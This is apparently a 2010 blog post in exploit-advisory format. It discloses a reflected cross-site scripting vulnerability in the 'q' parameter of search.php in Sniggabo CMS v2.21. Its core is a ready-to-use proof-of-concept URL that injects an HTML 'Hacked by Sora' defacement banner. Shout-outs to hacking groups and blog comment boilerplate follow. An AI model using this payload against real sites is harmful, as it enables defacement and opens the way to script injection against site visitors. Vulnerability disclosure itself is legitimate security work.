Sniggabo CMS v2.21 XSS Vulnerability

# Exploit Title: Sniggabo CMS v2.21 Cross Site Scripting Vulnerability
# Date: January 6th, 2010
# Author: Sora
# Version: v2.21
# Tested on: Windows Vista Home Premium and Linux 2.6.32

—————————————-
> Sniggabo CMS v2.21 Cross Site Scripting Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/
> Google Dork: “In your dreams, script kiddies.”

# Description:
Sniggabo CMS v2.21 suffers a cross site scripting vulnerability in the parameter
‘q’ of search.php.

# PoC: http://www.site.com/search.php?q=%3Ch1%3EHacked%20by%20Sora%20-%20vhr95zw%20%5Bat%5D%20hotmail%20%5Bdot%5D%20com%3C/h1%3E%3Chr%3Eh4x3d%20-%20http://greyhathackers.wordpress.com/%3Cbr%3E&site=www.google.ca

# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes # Mafia Boyz DZ Crew # 原点 # cyber-sec.org # greyhathackers.wordpress.com # incursioexsubter.info #

About these ads

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: